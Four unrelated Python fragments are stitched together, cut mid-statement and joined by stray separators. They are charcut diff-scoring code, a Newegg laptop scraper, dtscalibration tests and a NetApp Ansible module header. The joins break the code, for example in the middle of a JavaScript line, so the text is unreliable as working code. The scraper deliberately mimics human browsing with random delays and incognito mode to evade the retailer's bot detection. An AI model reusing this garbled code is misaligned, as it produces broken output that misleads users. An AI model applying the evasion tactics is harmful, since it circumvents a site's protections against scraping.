reg_matches = find_regular_matches(base_ops)
clean_ops = list(merge_adjacent_diffs(list(add_shift_distance(base_ops, reg_matches))))
cand_ops = sorted(op for op in clean_ops if op[0] != -1)
ref_ops = sorted((op for op in clean_ops if op[1] != -1), key=itemgetter(1))
styled_cand = list(add_css_classes(cand_ops))
styled_ref = list(add_css_classes(ref_ops))
return styled_cand, styled_ref
def _get_cost(styled_ops, css_clazz):
return sum(len(slice) for _, _, slice, _, clazz, _ in styled_ops
if clazz == css_clazz)
def score_all(aligned_segs, styled_ops, alt_norm):
"""Score segment pairs based on their differences."""
for ((seg_id, _, src, cand, ref), (styled_cand, styled_ref)) in zip(aligned_segs, styled_ops):
ins_cost = _get_cost(styled_cand, 'del')
del_cost = _get_cost(styled_ref, 'ins')
# shifts are the same in cand and ref
shift_cost = _get_cost(styled_cand, 'shift')
cost = ins_cost + del_cost + shift_cost
div = 2 * len(cand) if alt_norm else len(cand) + len(ref)
# Prevent scores > 100%
bounded_cost = min(cost, div)
yield bounded_cost, div
def ops2html(styled_ops, seg_id):
for op in styled_ops:
_, _, slice, dist, css, css_id = op
substr_id = 'seg{}_{}'.format(seg_id, css_id)
dist_str = '({:+d})'.format(dist) if dist else ''
slice_len = len(slice)
yield '<span title="{css}{dist_str}: {slice_len}" class="{css} {substr_id}" ' \
'onmouseenter="enter(\'{substr_id}\')" onmouseleave="leave(\'{substr_id}\')">' \
'{slice}</span>'.format(**locals())
seg_counter = 0
def segs2html(segs, ops, score_pair, mt_label="MT:", ref_label="Ref:", use_id_col=True):
"""Do highlighting on a single segment pair."""
global seg_counter
seg_counter += 1
seg_id, origin, src, cand, ref = segs
styled_cand, styled_ref = ops
cost, div = score_pair
score = (1.*cost/div) if div else 0
origin_str = '<p class="detail">({})</p>'.format(origin) if origin else ''
src_str = '''<tr>
<td class="seghead midrow">Src:</td>
<td class="midrow src">{}</td>
</tr>'''.format(src) if src else ''
cand_str = ''.join(ops2html(styled_cand, seg_counter))
ref_str = ''.join(ops2html(styled_ref, seg_counter))
id_row = ""
if use_id_col: id_row = '<td class="mainrow">{origin_str}{seg_id}</td>'.format(**locals())
return '''
<tr>
{id_row}
<td class="mainrow score">
<span class="detail">{cost:.0f}/{div:.0f}=</span><br/>{score:.0%}
</td>
<td class="mainrow">
<table>
{src_str}
<tr>
<td class="seghead midrow">{mt_label}</td>
<td class="midrow trg">
{cand_str}
</td>
</tr>
<tr>
<td class="seghead">{ref_label}</td><td class="trg">
{ref_str}
</td>
</tr>
</table>
</td>
</tr>
'''.format(**locals())
def html_dump(out_file, aligned_segs, styled_ops, seg_scores, doc_cost, doc_div):
"""
Do highlighting on all segments and output them as a HTML file.
aligned_segs are the input segments as returned by load_input_segs().
styled_ops are the decorated operations as returned by compare_segments().
seg_scores are the pairs (cost, div) as returned by score_all().
"""
print('''<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>charcut output</title>
<style>
body {font-family: sans-serif; font-size: 11pt;}
table, td, th {border-spacing: 0;}
th {padding: 10px;}
td {padding: 5px;}
th {border-top: solid black 2px; font-weight: normal;}
.tophead {border-bottom: solid black 1px;}
.src {font-style: oblique;}
.trg {font-family: Consolas, monospace;}
.del {font-weight: bold; color: #f00000;}
.ins {font-weight: bold; color: #0040ff;}
.shift {font-weight: bold;}
.match {}
.mainrow {border-top: solid black 1px; padding: 1em;}
.midrow {border-bottom: dotted gray 1px;}
.seghead {color: gray; text-align: right;}
.score {font-family: Consolas, monospace; text-align: right; font-size: large;}
.detail {font-size: xx-small; color: gray;}
</style>
<script>
function enter(cls) {
var elts = document.getElementsByClassName(cls);
for (var i=0; i<elts.length; i++)
elts[i].style.backgroundColor | |
Please wait... \n")
for i in range(0, 1):
browser.reload()
time.sleep(2)
browser.back()
print("Sleeping for 30 seconds to emulate humans. \n")
time.sleep(30)
browser.forward()
playsound('./sounds/break_pedal.wav')
break_pedal_ayh = input("Please click a laptop item, and add or remove it from the cart, and go back to the same page using the back button of your browser. \n Then enter in any key and press enter to continue scraping. \n")
# Allocate time for page to load.
time.sleep(3)
print("Targeting new url... ")
# After user passes test, target the new url, and return updated target_page_soup.
target_url = browser.url
response_target = requests.get(target_url)
target_page_soup = soup(response_target.text, 'html.parser')
# Recursively call the function, and if it passes, continue on with the program.
are_you_human_backend(target_page_soup)
else:
print("Passed the 'Are you human?' check when requesting and parsing the html. Continuing with scrape ... \n")
# Otherwise, return the target_page_soup that was passed in.
return target_page_soup
# In[12]:
# crazy idea, put links in a list, and then loop thru them and try and except else (break out of the loop) and continue
def random_xpath_top_bottom():
x = random.randint(3, 8)
def rdm_slp_3_8(x):
time.sleep(x)
print(f"Slept for {x} seconds. \n")
return x
coin_toss_top_bottom = random.randint(0,1)
next_page_button_results = []
# If the coin toss is even, mouse_over and click the top page link.
if (coin_toss_top_bottom == 0):
try:
print('Heads - Clicking "Next Page" Top Button. \n')
x = random.randint(3, 8)
print(f"Mimic human behavior by randomly sleeping for {x}. \n")
rdm_slp_3_8(x)
browser.find_by_xpath('/html/body/div[4]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[1]/div[2]/div/div[2]/button').mouse_over()
time.sleep(1)
browser.find_by_xpath('/html/body/div[4]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[1]/div[2]/div/div[2]/button').click()
next_page_button_results.append(coin_toss_top_bottom)
print('Heads - SUCCESSFUL "Next Page" Top Button. \n')
return
except:
print("EXCEPTION - Top Next Page button mouse over and click UNSUCCESSFUL... ")
try:
x = random.randint(3, 8)
print(f"Mimic human behavior by randomly sleeping for {x}. \n")
rdm_slp_5_9(x)
print('Attempting to click the bottom "Next Page" Xpath Bottom Button. \n')
browser.find_by_xpath('/html/body/div[4]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[4]/div/div/div[11]/button').mouse_over()
time.sleep(4)
browser.find_by_xpath('/html/body/div[4]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[4]/div/div/div[11]/button').click()
print('EXCEPTION BYPASSED - Bottom Next Page Button SUCCESSFUL! \n')
except:
print("EXCEPTION - Top and Bottom Next Page Button Link not working... \n")
playsound('./sounds/break_pedal.wav')
break_pedal_xptb = input("Break Pedal - Please manually click next page. Then enter in any key and press enter to continue the scrape. \n ")
print("Continuing... \n")
print("="*60)
return
else: # If coin toss is tails or 1, then...
try:
print('Tails - Clicking "Next Page" Xpath Bottom Button. \n')
x = random.randint(3, 8)
print(f"Mimic human behavior by randomly sleeping for {x}. \n")
rdm_slp_5_9(x)
browser.find_by_xpath('/html/body/div[4]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[4]/div/div/div[11]/button').mouse_over()
time.sleep(4)
browser.find_by_xpath('/html/body/div[4]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[4]/div/div/div[11]/button').click()
print('Tails - 1st Bottom Xpath - SUCCESSFUL "Next Page" Bottom Button. \n')
except:
print("EXCEPTION - 1st Bottom Xpath Failed. Sleep for 4 second then will try with 2nd Xpath bottom link. \n")
try:
time.sleep(4)
browser.find_by_xpath('/html/body/div[4]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[3]/div/div/div[11]/button').mouse_over()
time.sleep(4)
browser.find_by_xpath('/html/body/div[4]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[3]/div/div/div[11]/button').click()
print('EXCEPTION BYPASSED! Tails - 2nd Bottom Xpath - SUCCESSFUL "Next Page" Bottom Button. \n')
except:
print("EXCEPTION - 2nd Bottom Xpath Failed. Trying with 3rd Xpath bottom link. \n")
try:
time.sleep(4)
browser.find_by_xpath('/html/body/div[5]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[4]/div/div/div[11]/button').mouse_over()
time.sleep(4)
browser.find_by_xpath('/html/body/div[5]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[4]/div/div/div[11]/button').click()
print('EXCEPTION BYPASSED! Tails - 3rd Bottom Xpath - SUCCESSFUL "Next Page" Bottom Button. \n')
except:
print("Last Bottom Next Page Xpath Button was unsuccessful... Will Attempt Top Next Page Button.... \n")
try:
x = random.randint(3, 8)
print(f"Mimic human behavior by randomly sleeping for {x}. \n")
rdm_slp_3_8(x)
browser.find_by_xpath('/html/body/div[4]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[1]/div[2]/div/div[2]/button').mouse_over()
time.sleep(1)
browser.find_by_xpath('/html/body/div[4]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[1]/div[2]/div/div[2]/button').click()
next_page_button_results.append(coin_toss_top_bottom)
print('EXCEPTION BYPASSED SUCCESSFUL "Next Page" Top Button worked. \n')
return
except:
print("EXCEPTION BYPASSES UNSUCCESSFUL - All 3 Xpath Bottom Button AND Top Next Page Xpath Button was not working due to JavaScipt Exceptions... \n")
playsound('./sounds/break_pedal.wav')
break_pedal_xptb = input("Break Pedal - Please manually click the next page button. Then enter in any key and press enter to continue the scrape. \n ")
return
# In[13]:
"""
This class takes in the dictionary from the webscraper function, and will be used in a list comprehension
to produce class "objects"
"""
class Laptops:
counter = 0
def __init__(self, **entries):
self.__dict__.update(entries)
def count(self):
print(f"Total Laptops scraped: {Laptops.counter}")
"""
Originally modeled out parent/child inheritance object structure.
After careful research, I found it much easier to export the Pandas Dataframe of the results to a dictionary,
and then into a class object.
"""
# class Product_catalog:
# all_prod_count = 0
# def __init__(self, general_category): # computer systems
# self.general_category = general_category
# Product_catalog.all_prod_count += 1
# def count_prod(self):
# return int(self.all_prod_count)
# #return '{}'.format(self.general_category)
# Sub_category was later changed to Laptops due to the scope of this project.
# class Sub_category(Product_catalog): # laptops/notebooks, gaming
# sub_category_ct = 0
# def __init__(self, general_category, sub_categ, item_num, brand, price, img_link, prod_link, model_specifications, current_promotions):
# super().__init__(general_category)
# Sub_category.sub_category_ct += 1
# self.sub_categ = sub_categ
# self.item_num = item_num
# self.brand = brand
# self.price = price
# self.img_link = img_link
# self.prod_link = prod_link
# self.model_specifications = model_specifications
# self.current_promotions = current_promotions
# ## Main Program Logic
# ---
# In[14]:
""" Welcome to the program message!
"""
print("=== NewEgg.Com Laptop - Supervised Web Crawler & Scraper Beta v1.0 ===")
print("=="*30)
print('Scope: This project is a beta and is only built to scrape the laptop section of NewEgg.com due to limited time. \n')
print("Instructions: \n")
return_dt()
print(f'Current Date And Time: {current_date} \n')
print("(1) Go to www.newegg.com, go to the laptop section, select your requirements (e.g. brand, screensize, and specifications - SSD size, processor brand and etc...) ")
print("(2) Copy and paste the url from your exact search when prompted ")
print('(3) This is a "Supervised Scraper", meaning it will mostly be automated, but you will be alerted to take action when necessary. ')
print('(4) You may run the program in the background after the initial set of instructions, as the program will alert you to take action (e.g. when Newegg suspects a bot. )')
print('(5) After the webscraping is successful, you will have an option to concatenate all of the pages you scraped together into one csv file')
print('(6) Lastly, you will have an option to clear out the processing folder (data scraped by each page)')
print('(7) If you have any issues or errors, "PRESS CTRL + C" to quit the program in the terminal ')
print('Disclaimer: Newegg may ban you for a 24 - 48 hours for webscraping their data, then you may resume. \n Also, please consider executing during the day, with tons of web traffic to their site in your respective area. \n')
print('Happy Scraping!')
# Set up Splinter requirements.
executable_path = {'executable_path': './chromedriver.exe'}
# Ask user to input in the laptop query link they would like to scrape.
url = input("Please copy and paste your laptop query that you want to webscrape, and press enter: \n")
browser = Browser('chrome', **executable_path, headless=False, incognito=True)
browser.visit(url)
# Allocating loading time.
time.sleep(3)
break_pedal_1 = input("Break Pedal - close any pop ups and go any item and add one to the cart and go to the first search query. ")
current_url = browser.url
response = requests.get(current_url)
print(f"{response} \n")
target_page_soup = soup(response.text, 'html.parser')
# Run the results_pages function to gather the total pages to be scraped.
results_pages(target_page_soup)
"""
This is the loop that performs the page by page scraping of data / results
of the user's query.
"""
# List set up for where class Laptop objects will be stored.
print("Beginning webscraping and activity log below... ")
print("="*60)
product_catalog = []
for turn_page in range(1, total_results_pages+1):
"""
If "reCAPTCHA" pops up, pause the program using an input. This allows the user to continue
to scrape after they're done completing the quiz by inputting any value.
"""
# Allocating loading time.
time.sleep(3)
# Check if the site believes we are a bot, if so alert the user to take action.
g_recaptcha_check()
print(f"Beginning mouse over activity... \n")
# Set up "containers" to be passed into main scraping function.
if turn_page == 1:
containers = target_page_soup.find_all("div", class_="item-container")
# Added this and moved it here to test new setup.
newegg_page_scraper(containers, turn_page)
else:
web_Scraper_part2()
print("Creating laptop objects for this page... \n")
# Create instances of class objects of the laptops/notebooks using a list comprehension.
objects = [Laptops(**prod_obj) for prod_obj in scraped_dict]
print(f"Finished creating Laptop | |
<reponame>BSchilperoort/python-dts-calibration
# coding=utf-8
import os
import numpy as np
import scipy.sparse as sp
from scipy import stats
from dtscalibration import DataStore
from dtscalibration import read_xml_dir
from dtscalibration.calibrate_utils import wls_sparse
from dtscalibration.calibrate_utils import wls_stats
from dtscalibration.cli import main
np.random.seed(0)
fn = ["channel 1_20170921112245510.xml",
"channel 1_20170921112746818.xml",
"channel 1_20170921112746818.xml"]
fn_single = ["channel 2_20180504132202074.xml",
"channel 2_20180504132232903.xml",
"channel 2_20180504132303723.xml"]
if 1:
# working dir is tests
wd = os.path.dirname(os.path.abspath(__file__))
data_dir_single_ended = os.path.join(wd, 'data', 'single_ended')
data_dir_double_ended = os.path.join(wd, 'data', 'double_ended')
data_dir_double_ended2 = os.path.join(wd, 'data', 'double_ended2')
else:
# working dir is src
data_dir_single_ended = os.path.join('..', '..', 'tests', 'data', 'single_ended')
data_dir_double_ended = os.path.join('..', '..', 'tests', 'data', 'double_ended')
data_dir_double_ended2 = os.path.join('..', '..', 'tests', 'data', 'double_ended2')
def test_main():
assert main([]) == 0
def test_double_ended_variance_estimate_synthetic():
import dask.array as da
from dtscalibration import DataStore
import numpy as np
from scipy import stats
np.random.seed(0)
state = da.random.RandomState(0)
# from dtscalibration.calibrate_utils import
stokes_m_var = 40.
cable_len = 100.
nt = 500
time = np.arange(nt)
x = np.linspace(0., cable_len, 100)
ts_cold = np.ones(nt) * 4.
ts_warm = np.ones(nt) * 20.
C_p = 15246
C_m = 2400.
dalpha_r = 0.0005284
dalpha_m = 0.0004961
dalpha_p = 0.0005607
gamma = 482.6
cold_mask = x < 0.5 * cable_len
warm_mask = np.invert(cold_mask) # == False
temp_real = np.ones((len(x), nt))
temp_real[cold_mask] *= ts_cold + 273.15
temp_real[warm_mask] *= ts_warm + 273.15
st = C_p * np.exp(-dalpha_r * x[:, None]) * np.exp(-dalpha_p * x[:, None]) * np.exp(
-gamma / temp_real) / (1 - np.exp(-gamma / temp_real))
ast = C_m * np.exp(-dalpha_r * x[:, None]) * np.exp(-dalpha_m * x[:, None]) / (
1 - np.exp(-gamma / temp_real))
rst = C_p * np.exp(-dalpha_r * (-x[:, None] + 100)) * np.exp(
-dalpha_p * (-x[:, None] + 100)) * np.exp(-gamma / temp_real) / (
1 - np.exp(-gamma / temp_real))
rast = C_m * np.exp(-dalpha_r * (-x[:, None] + 100)) * np.exp(
-dalpha_m * (-x[:, None] + 100)) / (1 - np.exp(-gamma / temp_real))
st_m = st + stats.norm.rvs(size=st.shape, scale=stokes_m_var ** 0.5)
ast_m = ast + stats.norm.rvs(size=ast.shape, scale=1.1 * stokes_m_var ** 0.5)
rst_m = rst + stats.norm.rvs(size=rst.shape, scale=0.9 * stokes_m_var ** 0.5)
rast_m = rast + stats.norm.rvs(size=rast.shape, scale=0.8 * stokes_m_var ** 0.5)
print('alphaint', cable_len * (dalpha_p - dalpha_m))
print('alpha', dalpha_p - dalpha_m)
print('C', np.log(C_p / C_m))
print('x0', x.max())
ds = DataStore({
'st': (['x', 'time'], st),
'ast': (['x', 'time'], ast),
'rst': (['x', 'time'], rst),
'rast': (['x', 'time'], rast),
'mst': (['x', 'time'], st_m),
'mast': (['x', 'time'], ast_m),
'mrst': (['x', 'time'], rst_m),
'mrast': (['x', 'time'], rast_m),
'userAcquisitionTimeFW': (['time'], np.ones(nt)),
'userAcquisitionTimeBW': (['time'], np.ones(nt)),
'cold': (['time'], ts_cold),
'warm': (['time'], ts_warm)
},
coords={
'x': x,
'time': time},
attrs={
'customData:isDoubleEnded': '1'})
sections = {
'cold': [slice(0., 0.5 * cable_len)],
'warm': [slice(0.5 * cable_len, cable_len)]}
mst_var, _ = ds.variance_stokes(st_label='mst',
sections=sections,
suppress_info=True)
mast_var, _ = ds.variance_stokes(st_label='mast',
sections=sections,
suppress_info=True)
mrst_var, _ = ds.variance_stokes(st_label='mrst',
sections=sections,
suppress_info=True)
mrast_var, _ = ds.variance_stokes(st_label='mrast',
sections=sections,
suppress_info=True)
st_label = 'mst'
ast_label = 'mast'
rst_label = 'mrst'
rast_label = 'mrast'
# MC variqnce
ds.calibration_double_ended(sections=sections,
st_label=st_label,
ast_label=ast_label,
rst_label=rst_label,
rast_label=rast_label,
st_var=mst_var,
ast_var=mast_var,
rst_var=mrst_var,
rast_var=mrast_var,
method='wls',
# conf_ints=[0.00135, 0.025, 0.15865, 0.5, 0.84135, 0.975, 0.99865],
conf_ints=[0.025, 0.5, 0.975],
ci_avg_time_flag=0,
store_tempvar='_var',
conf_ints_size=500,
solver='sparse',
da_random_state=state)
# Calibrated variance
stdsf1 = ds.ufunc_per_section(label='TMPF',
func=np.std,
temp_err=True,
calc_per='stretch')
stdsb1 = ds.ufunc_per_section(label='TMPB',
func=np.std,
temp_err=True,
calc_per='stretch')
# Use a single timestep to better check if the parameter uncertainties propagate
ds1 = ds.isel(time=1)
# Estimated VAR
stdsf2 = ds1.ufunc_per_section(label='TMPF_MC_var',
func=np.mean,
temp_err=False,
calc_per='stretch')
stdsb2 = ds1.ufunc_per_section(label='TMPB_MC_var',
func=np.mean,
temp_err=False,
calc_per='stretch')
for (_, v1), (_, v2) in zip(stdsf1.items(), stdsf2.items()):
for v1i, v2i in zip(v1, v2):
print('Real VAR: ', v1i ** 2, 'Estimated VAR: ', v2i)
np.testing.assert_almost_equal(v1i ** 2, v2i, decimal=2)
for (_, v1), (_, v2) in zip(stdsb1.items(), stdsb2.items()):
for v1i, v2i in zip(v1, v2):
print('Real VAR: ', v1i ** 2, 'Estimated VAR: ', v2i)
np.testing.assert_almost_equal(v1i ** 2, v2i, decimal=2)
pass
def test_single_ended_variance_estimate_synthetic():
import dask.array as da
from dtscalibration import DataStore
import numpy as np
from scipy import stats
np.random.seed(0)
state = da.random.RandomState(0)
stokes_m_var = 40.
astokes_m_var = 60.
cable_len = 100.
nt = 50
time = np.arange(nt)
x = np.linspace(0., cable_len, 500)
ts_cold = np.ones(nt) * 4.
ts_warm = np.ones(nt) * 20.
C_p = 15246
C_m = 2400.
dalpha_r = 0.0005284
dalpha_m = 0.0004961
dalpha_p = 0.0005607
gamma = 482.6
cold_mask = x < 0.5 * cable_len
warm_mask = np.invert(cold_mask) # == False
temp_real = np.ones((len(x), nt))
temp_real[cold_mask] *= ts_cold + 273.15
temp_real[warm_mask] *= ts_warm + 273.15
st = C_p * np.exp(-dalpha_r * x[:, None]) * np.exp(-dalpha_p * x[:, None]) * np.exp(
-gamma / temp_real) / (1 - np.exp(-gamma / temp_real))
ast = C_m * np.exp(-dalpha_r * x[:, None]) * np.exp(-dalpha_m * x[:, None]) / (
1 - np.exp(-gamma / temp_real))
st_m = st + stats.norm.rvs(size=st.shape, scale=stokes_m_var ** 0.5)
ast_m = ast + stats.norm.rvs(size=ast.shape, scale=astokes_m_var ** 0.5)
print('alphaint', cable_len * (dalpha_p - dalpha_m))
print('alpha', dalpha_p - dalpha_m)
print('C', np.log(C_p / C_m))
print('x0', x.max())
ds = DataStore({
'st': (['x', 'time'], st),
'ast': (['x', 'time'], ast),
'mst': (['x', 'time'], st_m),
'mast': (['x', 'time'], ast_m),
'userAcquisitionTimeFW': (['time'], np.ones(nt)),
'cold': (['time'], ts_cold),
'warm': (['time'], ts_warm)
},
coords={
'x': x,
'time': time},
attrs={
'customData:isDoubleEnded': '0'})
sections = {
'cold': [slice(0., 0.5 * cable_len)],
'warm': [slice(0.5 * cable_len, cable_len)]}
st_label = 'mst'
ast_label = 'mast'
mst_var, _ = ds.variance_stokes(st_label=st_label,
sections=sections,
suppress_info=True)
mast_var, _ = ds.variance_stokes(st_label=ast_label,
sections=sections,
suppress_info=True)
# MC variqnce
ds.calibration_single_ended(sections=sections,
st_label=st_label,
ast_label=ast_label,
st_var=mst_var,
ast_var=mast_var,
method='wls',
# conf_ints=[0.00135, 0.025, 0.15865, 0.5, 0.84135, 0.975, 0.99865],
conf_ints=[0.025, 0.5, 0.975],
ci_avg_time_flag=0,
store_tempvar='_var',
conf_ints_size=500,
solver='sparse',
da_random_state=state)
# Calibrated variance
stdsf1 = ds.ufunc_per_section(label='TMPF',
func=np.std,
temp_err=True,
calc_per='stretch',
ddof=1)
# Use a single timestep to better check if the parameter uncertainties propagate
ds1 = ds.isel(time=1)
# Estimated VAR
stdsf2 = ds1.ufunc_per_section(label='TMPF_MC_var',
func=np.mean,
temp_err=False,
calc_per='stretch')
for (_, v1), (_, v2) in zip(stdsf1.items(), stdsf2.items()):
for v1i, v2i in zip(v1, v2):
print('Real VAR: ', v1i ** 2, 'Estimated VAR: ', v2i)
np.testing.assert_almost_equal(v1i ** 2, v2i, decimal=2)
pass
def test_variance_of_stokes():
correct_var = 40.16
filepath = data_dir_double_ended2
ds = read_xml_dir(filepath,
timezone_netcdf='UTC',
timezone_ultima_xml='Europe/Amsterdam',
file_ext='*.xml')
sections = {
'probe1Temperature': [slice(7.5, 17.), slice(70., 80.)], # cold bath
'probe2Temperature': [slice(24., 34.), slice(85., 95.)], # warm bath
}
I_var, _ = ds.variance_stokes(st_label='ST',
sections=sections,
use_statsmodels=True)
np.testing.assert_almost_equal(I_var, correct_var, decimal=1)
I_var, _ = ds.variance_stokes(st_label='ST',
sections=sections,
use_statsmodels=False)
np.testing.assert_almost_equal(I_var, correct_var, decimal=1)
ds_dask = ds.chunk(chunks={})
I_var, _ = ds_dask.variance_stokes(
st_label='ST',
sections=sections,
use_statsmodels=False)
np.testing.assert_almost_equal(I_var, correct_var, decimal=1)
pass
def test_variance_of_stokes_synthetic():
"""
Produces a synthetic Stokes measurement with a known noise distribution. Check if same
variance is obtained.
Returns
-------
"""
yvar = 5.
nx = 50
x = np.linspace(0., 20., nx)
nt = 1000
beta = np.linspace(3000, 4000, nt)[None]
y = beta * np.exp(-0.001 * x[:, None])
y += stats.norm.rvs(size=y.size,
scale=yvar ** 0.5).reshape(y.shape)
ds = DataStore({
'test_ST': (['x', 'time'], y),
'probe1Temperature': (['time'], range(nt)),
'userAcquisitionTimeFW': (['time'], np.ones(nt)),
},
coords={
'x': x,
'time': range(nt)},
attrs={'customData:isDoubleEnded': '0'})
sections = {'probe1Temperature': [slice(0., 20.), ]}
test_ST_var, _ = ds.variance_stokes(st_label='test_ST',
sections=sections,
suppress_info=True)
np.testing.assert_almost_equal(test_ST_var, yvar,
decimal=1)
def test_calibration_ols():
"""Testing ordinary least squares procedure. And compare with device calibrated temperature.
The measurements were calibrated by the device using only section 8--17.m. Those temperatures
are compared up to 2 decimals. Silixa only uses a single calibration constant (I think they
fix gamma).
"""
filepath = data_dir_double_ended2
ds = read_xml_dir(filepath,
timezone_netcdf='UTC',
timezone_ultima_xml='Europe/Amsterdam',
file_ext='*.xml')
ds100 = ds.sel(x=slice(0, 100))
sections_ultima = {
'probe1Temperature': [slice(8., 17.)], # cold bath
}
st_label = 'ST'
ast_label = 'AST'
rst_label = 'REV-ST'
rast_label = 'REV-AST'
ds100.calibration_double_ended(sections=sections_ultima,
st_label=st_label,
ast_label=ast_label,
rst_label=rst_label,
rast_label=rast_label,
method='ols')
ds100['TMPAVG'] = (ds100.TMPF + ds100.TMPB) / 2
np.testing.assert_array_almost_equal(ds100.TMPAVG.data,
ds100.TMP.data,
decimal=1)
ds009 = ds100.sel(x=sections_ultima['probe1Temperature'][0])
np.testing.assert_array_almost_equal(ds009.TMPAVG.data,
ds009.TMP.data,
decimal=2)
pass
def test_calibrate_wls_procedures():
x = np.linspace(0, 10, 25 * 4)
np.random.shuffle(x)
X = x.reshape((25, 4))
beta = np.array([1, 0.1, 10, 5])
beta_w = np.concatenate((np.ones(10), np.ones(15) * 1.0))
beta_0 = np.array([1, 1, 1, 1])
y = np.dot(X, beta)
y_meas = y + np.random.normal(size=y.size)
# first check unweighted convergence
beta_numpy = np.linalg.lstsq(X, y, rcond=None)[0]
np.testing.assert_array_almost_equal(beta, beta_numpy, decimal=8)
ps_sol, ps_var = wls_stats(X, y, w=1, calc_cov=0)
p_sol, p_var = wls_sparse(X, y, w=1, calc_cov=0, x0=beta_0)
np.testing.assert_array_almost_equal(beta, ps_sol, decimal=8)
np.testing.assert_array_almost_equal(beta, p_sol, decimal=8)
# now with weights
dec = 8
ps_sol, ps_var, ps_cov = wls_stats(X, y_meas, w=beta_w, calc_cov=True)
p_sol, p_var, p_cov = wls_sparse(X, y_meas, w=beta_w, calc_cov=True, x0=beta_0)
np.testing.assert_array_almost_equal(p_sol, ps_sol, decimal=dec)
np.testing.assert_array_almost_equal(p_var, ps_var, decimal=dec)
np.testing.assert_array_almost_equal(p_cov, ps_cov, decimal=dec)
# Test array | |
#!/usr/bin/python
# (c) 2021, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
module: na_ontap_volume_efficiency
short_description: NetApp ONTAP enables, disables or modifies volume efficiency
extends_documentation_fragment:
- netapp.ontap.netapp.na_ontap
version_added: '21.2.0'
author: NetApp Ansible Team (@carchi8py) <<EMAIL>>
description:
- Enable, modify or disable volume efficiency
options:
state:
description:
- Whether the specified volume efficiency should be enabled or not.
choices: ['present', 'absent']
default: present
type: str
vserver:
description:
- Specifies the vserver for the volume.
required: true
type: str
path:
description:
- Specifies the path for the volume.
required: true
type: str
schedule:
description:
- Specifies the storage efficiency schedule.
type: str
policy:
description:
- Specifies the storage efficiency policy to use, only supported on AFF systems.
choices: ['auto', 'default', 'inline-only', '-']
type: str
enable_compression:
description:
- Specifies if compression is to be enabled.
type: bool
enable_inline_compression:
description:
- Specifies if in-line compression is to be enabled.
type: bool
enable_inline_dedupe:
description:
- Specifies if in-line deduplication is to be enabled, only supported on AFF systems or hybrid aggregates.
type: bool
enable_data_compaction:
description:
- Specifies if compaction is to be enabled.
type: bool
enable_cross_volume_inline_dedupe:
description:
- Specifies if in-line cross volume inline deduplication is to be enabled, this can only be enabled when inline deduplication is enabled.
type: bool
enable_cross_volume_background_dedupe:
description:
- Specifies if cross volume background deduplication is to be enabled, this can only be enabled when inline deduplication is enabled.
type: bool
volume_efficiency:
description:
- Start or Stop a volume efficiency operation on a given volume path.
choices: ['start', 'stop']
version_added: '21.4.0'
type: str
start_ve_scan_all:
description:
- Specifies the scanner to scan the entire volume without applying share block optimization.
version_added: '21.4.0'
type: bool
start_ve_build_metadata:
description:
- Specifies the scanner to scan the entire and generate fingerprint database without attempting the sharing.
version_added: '21.4.0'
type: bool
start_ve_delete_checkpoint:
description:
- Specifies the scanner to delete existing checkpoint and start the operation from the begining.
version_added: '21.4.0'
type: bool
start_ve_queue_operation:
description:
- Specifies the operation to queue if an exisitng operation is already running on the volume and in the fingerprint verification phase.
version_added: '21.4.0'
type: bool
start_ve_scan_old_data:
description:
- Specifies the operation to scan the file system to process all the existing data.
version_added: '21.4.0'
type: bool
start_ve_qos_policy:
description:
- Specifies the QoS policy for the operation.
choices: ['background', 'best-effort']
default: best-effort
version_added: '21.4.0'
type: str
stop_ve_all_operations:
description:
- Specifies that all running and queued operations to be stopped.
version_added: '21.4.0'
type: bool
storage_efficiency_mode:
description:
- Storage efficiency mode used by volume. This parameter is only supported on AFF platforms.
- Requires ONTAP 9.10.1 or later.
choices: ['default', 'efficient']
type: str
version_added: '21.14.0'
"""
EXAMPLES = """
- name: Enable Volume efficiency
na_ontap_volume_efficiency:
state: present
vserver: "TESTSVM"
path: "/vol/test_sis"
hostname: "{{ hostname }}"
username: "{{ username }}"
password: "{{ password }}"
https: true
validate_certs: false
- name: Disable Volume efficiency test
na_ontap_volume_efficiency:
state: absent
vserver: "TESTSVM"
path: "/vol/test_sis"
hostname: "{{ hostname }}"
username: "{{ username }}"
password: "{{ password }}"
https: true
validate_certs: false
- name: Modify storage efficiency policy
na_ontap_volume_efficiency:
state: present
vserver: "TESTSVM"
path: "/vol/test_sis"
schedule: "mon-sun@0,1,23"
enable_compression: "True"
enable_inline_compression: "True"
hostname: "{{ hostname }}"
username: "{{ username }}"
password: "{{ password }}"
https: true
validate_certs: false
- name: Start volume efficiency
na_ontap_volume_efficiency:
state: present
vserver: "TESTSVM"
volume_efficiency: "start"
hostname: "{{ hostname }}"
username: "{{ username }}"
password: "{{ password }}"
https: true
validate_certs: false
- name: Stop volume efficiency
na_ontap_volume_efficiency:
state: present
vserver: "TESTSVM"
volume_efficiency: "stop"
hostname: "{{ hostname }}"
username: "{{ username }}"
password: "{{ password }}"
https: true
validate_certs: false
"""
RETURN = """
"""
import copy
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
import ansible_collections.netapp.ontap.plugins.module_utils.netapp as netapp_utils
from ansible_collections.netapp.ontap.plugins.module_utils.netapp_module import NetAppModule
from ansible_collections.netapp.ontap.plugins.module_utils.netapp import OntapRestAPI
import ansible_collections.netapp.ontap.plugins.module_utils.rest_response_helpers as rrh
HAS_NETAPP_LIB = netapp_utils.has_netapp_lib()
class NetAppOntapVolumeEfficiency(object):
"""
Creates, Modifies and Disables a Volume Efficiency
"""
def __init__(self):
"""
